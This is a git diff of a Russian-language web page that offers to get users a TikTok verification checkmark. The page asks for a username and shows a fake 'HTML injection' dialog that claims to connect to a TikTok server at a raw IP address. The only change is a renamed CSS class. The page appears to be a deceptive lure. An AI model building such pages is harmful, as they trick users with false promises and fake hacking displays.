--- a/tiktok-verification/index.html
+++ b/tiktok-verification/index.html
@@ -117,7 +117,7 @@
 <body>
 	<div class="login-page">
   <div class="form">
-    <div class="title">Получить галочку в <img src="../assets/images/tiktok.png" class="social-logo"></div>
+    <div class="title">Получить галочку в <img src="../assets/images/tiktok.png" class="social-media-logo"></div>
     <input type="text" name="username" placeholder="Напишите ваш ник в Tik Tik">
     <div id="dialog" title="Инъекция HTML-кода">
   <div class="progress-label">Соединение с сервером Tik Tok(161.117.112.172)</div>
